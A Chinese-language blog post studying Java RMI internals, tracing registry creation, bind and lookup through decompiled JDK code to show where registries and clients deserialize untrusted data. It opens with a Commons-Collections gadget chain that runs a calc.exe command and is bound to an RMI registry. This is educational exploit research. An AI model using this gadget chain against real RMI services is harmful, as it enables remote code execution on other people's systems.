暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

RMI学习

8ypass 2021-06-10
217

RMI介绍

Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远程过程调用的应用程序编程接口。它使客户机上运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。RMI全部的宗旨就是尽可能简化远程接口对象的使用。

接口的两种常见实现方式是:最初使用JRMP(Java Remote Method Protocol,Java远程方法协议)实现;此外还可以用与CORBA兼容的方法实现。RMI一般指的是编程接口,也有时候同时包括JRMP和API(应用程序编程接口),而RMI-IIOP则一般指RMI接口把绝大部分功能委托给底层支持的CORBA实现。

最初的RMI API设计为通用地支持不同形式的接口实现。后来,CORBA增加了传值(pass by value)功能,以实现RMI接口。然而RMI-IIOP和JRMP实现的接口并不完全一致

RMI由三部分组成

客户端(java.rmi)

服务端(java.rmi.server)

注册中心(java.rmi.registry)


一个rmi例子

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;


import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.rmi.Remote;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.HashMap;
import java.util.Map;


/**
 * Demo used by the article to trace the RMI registry code paths.
 *
 * It assembles a java.rmi.Remote dynamic proxy whose invocation handler wraps a
 * commons-collections LazyMap / ChainedTransformer chain, then creates a registry on
 * port 4096 in the same JVM and binds the proxy under the name "demo".
 */
public class Rmiregister {


/**
 * Builds the proxied Remote object, starts the registry and binds the object.
 *
 * @param args unused
 * @throws Exception if any reflective lookup or instantiation fails
 */
public static void main(String[] args) throws Exception{
// Placeholder chain: a single ConstantTransformer. The ChainedTransformer is first
// constructed with this array and only later switched to the real one (see below).
Transformer[] fakertransformers=new Transformer[]{new ConstantTransformer(new Class[0])};
// Real chain: Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec(<command string>).
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] { String.class,
Class[].class }, new
Object[] { "getRuntime",
new Class[0] }),
new InvokerTransformer("invoke", new Class[] { Object.class,
Object[].class }, new
Object[] { null, new Object[0] }),
new InvokerTransformer("exec", new Class[] { String.class },
new String[] { "cmd.exe /c calc.exe" }),
};
Transformer transformerChain = new ChainedTransformer(fakertransformers);
HashMap h=new HashMap();
// LazyMap that decorates the empty HashMap with the transformer chain.
LazyMap lazy_map= (LazyMap) LazyMap.decorate(h,transformerChain);


// The (Class, Map) constructor is obtained reflectively and made accessible before use.
Constructor AnnotationInvocationHandler_constructor_invoke=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
AnnotationInvocationHandler_constructor_invoke.setAccessible(true);
InvocationHandler AnnotationInvocationHandler_constructor_in= (InvocationHandler) AnnotationInvocationHandler_constructor_invoke.newInstance(Override.class,lazy_map);
// Reflectively replace the chain's iTransformers field with the real transformer array.
Field f=transformerChain.getClass().getDeclaredField("iTransformers");
f.setAccessible(true);
f.set(transformerChain,transformers);
// Dynamic proxy implementing Map, backed by the first handler.
Map proxy= (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),new Class[]{Map.class},AnnotationInvocationHandler_constructor_in);






// Second handler instance, this time wrapping the Map proxy created above.
Constructor AnnotationInvocationHandler_constructor=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
AnnotationInvocationHandler_constructor.setAccessible(true);
InvocationHandler AnnotationInvocationHandler_constructor_payload = (InvocationHandler) AnnotationInvocationHandler_constructor.newInstance(Override.class,proxy);
// Dynamic proxy implementing Remote so the object can be passed to Registry.bind.
// NOTE(review): `rmiserial` is not declared anywhere in the code shown here; presumably
// this class (Rmiregister) was intended - confirm, as this line will not compile as-is.
Remote remote=Remote.class.cast(Proxy.newProxyInstance(rmiserial.class.getClassLoader(),new Class[]{Remote.class},AnnotationInvocationHandler_constructor_payload));


try {
// Create the registry on port 4096 and bind the proxy as "demo".
Registry registry = LocateRegistry.createRegistry(4096);
registry.bind("demo",remote);


}catch (Exception e){
// Failures are only printed; execution continues to the loop below.
System.out.println(e);
}
// Empty infinite loop so main never returns.
// NOTE(review): this is a busy-wait and will spin a CPU core.
while(true);


}
}


这里在createRegistry打断点 分析执行流程


    /**
     * Creates a registry by constructing a new RegistryImpl for the given port.
     *
     * @param port port number passed to the RegistryImpl constructor
     * @return the newly constructed RegistryImpl
     * @throws RemoteException declared by this method; propagated from the constructor
     */
    public static Registry createRegistry(int port) throws RemoteException {
return new RegistryImpl(port);
}

跟入RegistryImpl

    /**
     * Wraps the port in a LiveRef, wraps that in a UnicastServerRef and hands it to setup.
     *
     * @param var1 the port number
     */
    public RegistryImpl(int var1) throws RemoteException {
        LiveRef var2 = new LiveRef(id, var1); // var1 is the port number; it is wrapped into a LiveRef object
        this.setup(new UnicastServerRef(var2)); 
}

跟入setup

    /**
     * Stores the server ref and exports this object through it.
     *
     * @param var1 the UnicastServerRef created in the constructor
     */
    private void setup(UnicastServerRef var1) throws RemoteException {
this.ref = var1;
var1.exportObject(this, (Object)null, true); // the first argument is the RegistryImpl itself
}


exportObject

 /**
  * Exports a remote object: creates its stub/proxy, optionally sets a skeleton,
  * wraps everything in a Target and exports that Target through this.ref.
  *
  * @param var1 the remote object being exported (here: the RegistryImpl)
  * @param var2 not used in this method body
  * @param var3 flag forwarded to the Target constructor
  * @return the stub/proxy produced by Util.createProxy
  * @throws RemoteException ExportException if createProxy throws IllegalArgumentException
  */
 public Remote exportObject(Remote var1, Object var2, boolean var3) throws RemoteException {
Class var4 = var1.getClass(); // RegistryImpl


Remote var5;
try {
            var5 = Util.createProxy(var4, this.getClientRef(), this.forceStubUse); // step into
} catch (IllegalArgumentException var7) {
throw new ExportException("remote object implements illegal remote interface", var7);
}


// A skeleton is only set when the created proxy is a RemoteStub.
if (var5 instanceof RemoteStub) {
this.setSkeleton(var1);
}


// Bundle object, this ref, stub, object id and the flag into a Target and export it.
Target var6 = new Target(var1, this, var5, this.ref.getObjID(), var3);
this.ref.exportObject(var6);
this.hashToMethod_Map = (Map)hashToMethod_Maps.get(var4);
return var5;
}

createProxy

/**
 * Returns either a stub instance (via createStub) or a java.lang.reflect.Proxy for the
 * given implementation class.
 *
 * @param var0 implementation class of the remote object
 * @param var1 remote reference handed to the stub or to the invocation handler
 * @param var2 when true, the stub path is always taken
 * @return the stub or dynamic proxy
 * @throws StubNotFoundException if no remote class is found or the proxy cannot be created
 */
public static Remote createProxy(Class var0, RemoteRef var1, boolean var2) throws StubNotFoundException {
Class var3;
try {
var3 = getRemoteClass(var0);
} catch (ClassNotFoundException var9) {
throw new StubNotFoundException("object does not implement a remote interface: " + var0.getName());
}


// Stub path: forced by var2, or stub classes are not ignored and one exists for var3.
if (var2 || !ignoreStubClasses && stubClassExists(var3)) {
return createStub(var3, var1); // step into
} else {
// Proxy path: dynamic proxy over the remote interfaces, backed by a
// RemoteObjectInvocationHandler wrapping var1.
ClassLoader var4 = var0.getClassLoader();
Class[] var5 = getRemoteInterfaces(var0);
RemoteObjectInvocationHandler var6 = new RemoteObjectInvocationHandler(var1);


try {
return (Remote)Proxy.newProxyInstance(var4, var5, var6);
} catch (IllegalArgumentException var8) {
throw new StubNotFoundException("unable to create proxy", var8);
}
}
}


跟入createStub

private static RemoteStub createStub(Class var0, RemoteRef var1) throws StubNotFoundException {
        String var2 = var0.getName() + "_Stub"//这里是RegistryImpl_Stub


try {
Class var3 = Class.forName(var2, false, var0.getClassLoader());
Constructor var4 = var3.getConstructor(stubConsParamTypes);
return (RemoteStub)var4.newInstance(var1);
} catch (ClassNotFoundException var5) {
throw new StubNotFoundException("Stub class not found: " + var2, var5);
} catch (NoSuchMethodException var6) {
throw new StubNotFoundException("Stub class missing constructor: " + var2, var6);
} catch (InstantiationException var7) {
throw new StubNotFoundException("Can't create instance of stub class: " + var2, var7);
} catch (IllegalAccessException var8) {
throw new StubNotFoundException("Stub class constructor not public: " + var2, var8);
} catch (InvocationTargetException var9) {
throw new StubNotFoundException("Exception creating instance of stub class: " + var2, var9);
} catch (ClassCastException var10) {
throw new StubNotFoundException("Stub class not instance of RemoteStub: " + var2, var10);
}
}

createStub的作用就是通过反射创建并返回RegistryImpl_Stub的实例,所以上面的var5就是一个RegistryImpl_Stub的实例


继续跟入exportObject的后半段

        if (var5 instanceof RemoteStub) {
this.setSkeleton(var1);
}


Target var6 = new Target(var1, this, var5, this.ref.getObjID(), var3);
this.ref.exportObject(var6);
this.hashToMethod_Map = (Map)hashToMethod_Maps.get(var4);
return var5;
}


跟入this.ref.exportObject(var6);

/**
 * Starts listening (under this object's lock), bumps the export count, then delegates the
 * actual export to the superclass. If the superclass export does not complete, the export
 * count is decremented again.
 *
 * @param var1 the Target to export
 */
public void exportObject(Target var1) throws RemoteException {
synchronized(this) {
this.listen();
++this.exportCount;
}


// var2: set to true once super.exportObject has returned normally.
// var12: true only while super.exportObject is in flight
// (presumably a decompiler artifact of the original try/finally - confirm).
boolean var2 = false;
boolean var12 = false;


try {
var12 = true;
super.exportObject(var1);
var2 = true;
var12 = false;
} finally {
// Reached with var12 still true only if super.exportObject threw.
if (var12) {
if (!var2) {
synchronized(this) {
this.decrementExportCount();
}
}


}
}


if (!var2) {
synchronized(this) {
this.decrementExportCount();
}
}


}


listen

/**
 * Ensures a server socket exists for this transport's endpoint. Must be called while
 * holding this object's lock (asserted below).
 *
 * If no server socket exists yet, one is created from the endpoint and an AcceptLoop thread
 * named "TCP Accept-<port>" is started for it. Otherwise, if a SecurityManager is installed,
 * only its checkListen is invoked for the port.
 *
 * @throws RemoteException ExportException when the socket cannot be bound or opened
 */
private void listen() throws RemoteException {
assert Thread.holdsLock(this);


TCPEndpoint var1 = this.getEndpoint();
int var2 = var1.getPort();
if (this.server == null) {
if (tcpLog.isLoggable(Log.BRIEF)) {
tcpLog.log(Log.BRIEF, "(port " + var2 + ") create server socket");
}


try {
this.server = var1.newServerSocket();
// The thread is built through NewThreadAction inside doPrivileged and runs the accept loop.
Thread var3 = (Thread)AccessController.doPrivileged(new NewThreadAction(new TCPTransport.AcceptLoop(this.server), "TCP Accept-" + var2, true));
var3.start();
} catch (BindException var4) {
throw new ExportException("Port already in use: " + var2, var4);
} catch (IOException var5) {
throw new ExportException("Listen failed on port: " + var2, var5);
}
} else {
// Already listening: only run the security check for the port.
SecurityManager var6 = System.getSecurityManager();
if (var6 != null) {
var6.checkListen(var2);
}
}


}

listen主要做的就是开始监听

总结

createRegistry返回的是一个RegistryImpl对象;在其构造过程中会通过exportObject反射创建RegistryImpl_Stub,并且根据传入的端口开始socket监听

            Registry registry = LocateRegistry.createRegistry(4096);
registry.bind("demo",remote);


在Registryimpl_stub的bind,看对象如何绑定

    /**
     * Stub-side bind: opens a remote call with operation number 0, serializes the name and
     * the remote object into the call's output stream, then invokes and completes the call.
     *
     * @param var1 the name to bind under
     * @param var2 the remote object to bind
     */
    public void bind(String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException {
try {
// Operation number 0 and the interface hash are passed to newCall.
RemoteCall var3 = super.ref.newCall(this, operations, 0, 4905912898345647071L);


try {
// Both arguments are written with writeObject, i.e. Java-serialized.
ObjectOutput var4 = var3.getOutputStream();
var4.writeObject(var1);
var4.writeObject(var2);
} catch (IOException var5) {
throw new MarshalException("error marshalling arguments", var5);
}


super.ref.invoke(var3);
super.ref.done(var3);
} catch (RuntimeException var6) {
throw var6;
} catch (RemoteException var7) {
throw var7;
} catch (AlreadyBoundException var8) {
throw var8;
} catch (Exception var9) {
// Any other checked exception is wrapped.
throw new UnexpectedException("undeclared checked exception", var9);
}
}

其中var1为对象名称,var2才是对象本体,可以看到这里把对象序列化了。

这里ref是UnicastServerRef,调用的是UnicastServerRef父类的newcall


跟入这个newcall

 /**
  * Opens a connection on this ref's channel and creates a StreamRemoteCall on it.
  *
  * @param var1 the remote object making the call (used only for logging here)
  * @param var2 operations array (used only for logging here)
  * @param var3 operation number, forwarded to StreamRemoteCall
  * @param var4 hash value, forwarded to StreamRemoteCall
  * @return the new StreamRemoteCall
  * @throws RemoteException on failure; the connection is freed before rethrowing
  */
 public RemoteCall newCall(RemoteObject var1, Operation[] var2, int var3, long var4) throws RemoteException {
clientRefLog.log(Log.BRIEF, "get connection");
Connection var6 = this.ref.getChannel().newConnection(); // obtain a connection


try {
clientRefLog.log(Log.VERBOSE, "create call context");
if (clientCallLog.isLoggable(Log.VERBOSE)) {
this.logClientCall(var1, var2[var3]);
}


StreamRemoteCall var7 = new StreamRemoteCall(var6, this.ref.getObjID(), var3, var4);


try {
this.marshalCustomCallData(var7.getOutputStream());
} catch (IOException var9) {
// NOTE(review): the IOException is not attached as the cause here.
throw new MarshalException("error marshaling custom call data");
}


return var7;
} catch (RemoteException var10) {
// Release the connection (second argument false) before propagating.
this.ref.getChannel().free(var6, false);
throw var10;
}
}


var1是RegistryImpl_stub对象

var2是operations数组(即bind中调用newCall时传入的第二个参数)

var3是0

这里最终返回的是StreamRemoteCall对象 跟入


StreamRemoteCall

    /**
     * Stores the connection and writes the call header: the byte 80 on the raw connection
     * stream, then the object id, the operation number and the hash on this.out.
     *
     * @param var1 connection to write to
     * @param var2 object id written after the leading byte
     * @param var3 operation number
     * @param var4 hash value
     * @throws RemoteException MarshalException if writing the header fails
     */
    public StreamRemoteCall(Connection var1, ObjID var2, int var3, long var4) throws RemoteException {
try {
this.conn = var1;
Transport.transportLog.log(Log.VERBOSE, "write remote call header...");
this.conn.getOutputStream().write(80);
// Called for its side effect before this.out is used below
// (presumably it initializes this.out - confirm against the no-arg overload).
this.getOutputStream();
var2.write(this.out);
            this.out.writeInt(var3); // writes 0 (the operation number in the bind case)
            this.out.writeLong(var4); // writes the hash
} catch (IOException var7) {
throw new MarshalException("Error marshaling call header", var7);
}
}

注意这个getOutputstream

    /**
     * Lazily creates the ConnectionOutputStream for this call and returns it.
     *
     * @param var1 flag forwarded to the ConnectionOutputStream constructor
     * @return this.out, created on first use
     */
    private ObjectOutput getOutputStream(boolean var1) throws IOException {
if (this.out == null) {
Transport.transportLog.log(Log.VERBOSE, "getting output stream");
this.out = new ConnectionOutputStream(this.conn, var1);
}


return this.out;
}

最终返回的是StreamRemoteCall对象

/**
 * Stub-side bind (annotated copy): creates the remote call, serializes name and object
 * into it, then invokes and completes the call.
 *
 * @param var1 the name to bind under
 * @param var2 the remote object to bind
 */
public void bind(String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException {
try {
// var3 is a StreamRemoteCall
RemoteCall var3 = super.ref.newCall(this, operations, 0, 4905912898345647071L);


try {
                ObjectOutput var4 = var3.getOutputStream(); // returns the call's `out` stream
var4.writeObject(var1); // writes the name being bound
                var4.writeObject(var2); // writes the object bound to that name
} catch (IOException var5) {
throw new MarshalException("error marshalling arguments", var5);
}


super.ref.invoke(var3);
super.ref.done(var3);
} catch (RuntimeException var6) {
throw var6;
} catch (RemoteException var7) {
throw var7;
} catch (AlreadyBoundException var8) {
throw var8;
} catch (Exception var9) {
throw new UnexpectedException("undeclared checked exception", var9);
}
}

跟入上图的invoke

Unicastref


/**
 * Executes the given remote call. On any failure the failure is logged, the call is freed
 * and the original throwable is rethrown.
 *
 * @param var1 the call to execute
 * @throws Exception whatever executeCall throws
 */
public void invoke(RemoteCall var1) throws Exception {
try {
clientRefLog.log(Log.VERBOSE, "execute call");
            var1.executeCall(); // this calls StreamRemoteCall.executeCall
} catch (RemoteException var3) {
clientRefLog.log(Log.BRIEF, "exception: ", var3);
this.free(var1, false);
throw var3;
} catch (Error var4) {
clientRefLog.log(Log.BRIEF, "error: ", var4);
this.free(var1, false);
throw var4;
} catch (RuntimeException var5) {
clientRefLog.log(Log.BRIEF, "exception: ", var5);
this.free(var1, false);
throw var5;
} catch (Exception var6) {
// Only this branch frees the call with `true`; the branches above pass `false`.
clientRefLog.log(Log.BRIEF, "exception: ", var6);
this.free(var1, true);
throw var6;
}
}


跟入executeCall

/**
 * Sends the pending call and processes the reply header.
 *
 * Releases the output stream, then reads one byte from the connection and requires it to be
 * 81. It then reads the return-type byte and an id from the call's input stream and switches
 * on the return type: 1 returns normally, 2 reads an object that must be an Exception and
 * hands it to exceptionReceivedFromServer, anything else is rejected.
 *
 * @throws Exception UnmarshalException on malformed replies, or whatever
 *         exceptionReceivedFromServer raises
 */
public void executeCall() throws Exception {
DGCAckHandler var2 = null;


byte var1;
try {
if (this.out != null) {
var2 = this.out.getDGCAckHandler();
}


this.releaseOutputStream();
DataInputStream var3 = new DataInputStream(this.conn.getInputStream());
byte var4 = var3.readByte();
// The first reply byte must be 81.
if (var4 != 81) {
if (Transport.transportLog.isLoggable(Log.BRIEF)) {
Transport.transportLog.log(Log.BRIEF, "transport return code invalid: " + var4);
}


throw new UnmarshalException("Transport return code invalid");
}


this.getInputStream();
var1 = this.in.readByte();
this.in.readID();
} catch (UnmarshalException var11) {
throw var11;
} catch (IOException var12) {
throw new UnmarshalException("Error unmarshaling return header", var12);
} finally {
// The ack handler (if one was obtained) is always released.
if (var2 != null) {
var2.release();
}


}


switch(var1) {
case 1:
return;
case 2:
// The reply carries a serialized object, which is deserialized here.
Object var14;
try {
var14 = this.in.readObject();
} catch (Exception var10) {
throw new UnmarshalException("Error unmarshaling return", var10);
}


if (!(var14 instanceof Exception)) {
throw new UnmarshalException("Return type not Exception");
} else {
this.exceptionReceivedFromServer((Exception)var14);
}
// No break here: presumably exceptionReceivedFromServer always throws; otherwise control
// would fall through into the default branch - confirm.
default:
if (Transport.transportLog.isLoggable(Log.BRIEF)) {
Transport.transportLog.log(Log.BRIEF, "return code invalid: " + var1);
}


throw new UnmarshalException("Return code invalid");
}
}

总结:反射创建registryimpl_stub,调用里面的bind方法,把对象序列化后写入,通过executeCall进行请求分发。通过tcp发送消息到服务器。服务器端上面提到有一个监听,在 TCP 协议层发起 socket 监听,并采用多线程循环接收请求:TCPTransport.AcceptLoop(this.server),线程池来处理socket接收到的请求。通过一系列操作获取target对象,这个target对象已经是服务器对象。借由派发器Dispatcher,传入参数服务实现和请求对象remotecall,将请求派发给服务端那个真正提供服务的RegistryImpl 的 lookUp()方法。



lookup分析

/**
 * Stub-side lookup: opens a remote call with operation number 2, serializes the name,
 * invokes the call, then deserializes the returned Remote from the call's input stream.
 *
 * @param var1 the name to look up
 * @return the Remote object read from the reply
 */
public Remote lookup(String var1) throws AccessException, NotBoundException, RemoteException {
try {
          // var2 is likewise a StreamRemoteCall object
RemoteCall var2 = super.ref.newCall(this, operations, 2, 4905912898345647071L);


try {
ObjectOutput var3 = var2.getOutputStream();
var3.writeObject(var1);
} catch (IOException var18) {
throw new MarshalException("error marshalling arguments", var18);
}


            super.ref.invoke(var2); // calls executeCall


Remote var23;
try {
                ObjectInput var6 = var2.getInputStream(); // input stream carrying the registry's reply
var23 = (Remote)var6.readObject(); // deserialization of the reply
} catch (IOException var15) {
throw new UnmarshalException("error unmarshalling return", var15);
} catch (ClassNotFoundException var16) {
throw new UnmarshalException("error unmarshalling return", var16);
} finally {
// The call is always completed, whether or not reading succeeded.
super.ref.done(var2);
}


return var23;
} catch (RuntimeException var19) {
throw var19;
} catch (RemoteException var20) {
throw var20;
} catch (NotBoundException var21) {
throw var21;
} catch (Exception var22) {
throw new UnexpectedException("undeclared checked exception", var22);
}
}


可以看到这里lookup在获取registry返回的输入流后直接对其进行readObject,说明可以通过注册中心攻击客户端


为什么服务端bind能打注册中心

参考一些文章,得知在exportObject的时候会给this.skel赋值一个registryimpl_skel对象

    public Remote exportObject(Remote var1, Object var2, boolean var3) throws RemoteException {
Class var4 = var1.getClass();


Remote var5;
try {
var5 = Util.createProxy(var4, this.getClientRef(), this.forceStubUse);
} catch (IllegalArgumentException var7) {
throw new ExportException("remote object implements illegal remote interface", var7);
}


if (var5 instanceof RemoteStub) {
this.setSkeleton(var1); //这里
}


/**
 * Assigns this.skel from Util.createSkeleton for the given object, unless the object's class
 * is already recorded in withoutSkeletons. If no skeleton is found, the class is recorded
 * there and the exception is not propagated.
 *
 * @param var1 the remote object whose skeleton should be created
 */
public void setSkeleton(Remote var1) throws RemoteException {
if (!withoutSkeletons.containsKey(var1.getClass())) {
try {
this.skel = Util.createSkeleton(var1);
} catch (SkeletonNotFoundException var3) {
// Remember that this class has no skeleton.
withoutSkeletons.put(var1.getClass(), (Object)null);
}
}


}


registryimpl_skel对象的dispatch

public void dispatch(Remote var1, RemoteCall var2, int var3, long var4) throws Exception {
if (var4 != 4905912898345647071L) {
throw new SkeletonMismatchException("interface hash mismatch");
} else {
RegistryImpl var6 = (RegistryImpl)var1;
String var7;
Remote var8;
ObjectInput var10;
ObjectInput var11;
switch(var3) {
case 0:
try {
var11 = var2.getInputStream();
var7 = (String)var11.readObject();
var8 = (Remote)var11.readObject();
} catch (IOException var94) {
throw new UnmarshalException("error unmarshalling arguments", var94);
} catch (ClassNotFoundException var95) {
throw new UnmarshalException("error unmarshalling arguments", var95);
} finally {
var2.releaseInputStream();
}


var6.bind(var7, var8);

这里的var3是在registryimpl_stub中的bind设置

 public void bind(String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException {
try {
RemoteCall var3 = super.ref.newCall(this, operations, 0, 4905912898345647071L);


try {

可以看到设置为0

所以上面case 0的时候,会对rmi服务端bind的时候发送过来的序列化数据进行反序列化,这里就导致服务端打注册中心


客户端打注册中心


看到lookup

 public Remote lookup(String var1) throws AccessException, NotBoundException, RemoteException {
try {
RemoteCall var2 = super.ref.newCall(this, operations, 2, 4905912898345647071L);


try {
ObjectOutput var3 = var2.getOutputStream();
                var3.writeObject(var1); //这里对lookup传过来的string进行序列化了
} catch (IOException var18) {
throw new MarshalException("error marshalling arguments", var18);
}


super.ref.invoke(var2);


这里设置为2,对应case 里面的2分支

 public void dispatch(Remote var1, RemoteCall var2, int var3, long var4) throws Exception {
if (var4 != 4905912898345647071L) {
throw new SkeletonMismatchException("interface hash mismatch");
} else {
RegistryImpl var6 = (RegistryImpl)var1;
String var7;
Remote var8;
ObjectInput var10;
ObjectInput var11;
switch(var3) {
case 0:
try {
var11 = var2.getInputStream();
var7 = (String)var11.readObject();
var8 = (Remote)var11.readObject();
} catch (IOException var94) {
throw new UnmarshalException("error unmarshalling arguments", var94);
} catch (ClassNotFoundException var95) {
throw new UnmarshalException("error unmarshalling arguments", var95);
} finally {
var2.releaseInputStream();
}


var6.bind(var7, var8);


try {
var2.getResultStream(true);
break;
} catch (IOException var93) {
throw new MarshalException("error marshalling return", var93);
}
case 1:
var2.releaseInputStream();
String[] var97 = var6.list();


try {
ObjectOutput var98 = var2.getResultStream(true);
var98.writeObject(var97);
break;
} catch (IOException var92) {
throw new MarshalException("error marshalling return", var92);
}
case 2:
try {
var10 = var2.getInputStream();
var7 = (String)var10.readObject(); //对string进行反序列化
} catch (IOException var89) {
throw new UnmarshalException("error unmarshalling arguments", var89);
} catch (ClassNotFoundException var90) {
throw new UnmarshalException("error unmarshalling arguments", var90);
} finally {
var2.releaseInputStream();
}


var8 = var6.lookup(var7);


try {
ObjectOutput var9 = var2.getResultStream(true);
var9.writeObject(var8);
break;
} catch (IOException var88) {
throw new MarshalException("error marshalling return", var88);
}

用一下threedr3am师傅原图


参考链接

https://xz.aliyun.com/t/7079

https://xz.aliyun.com/t/7264

https://paper.seebug.org/1420/


文章转载自8ypass,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论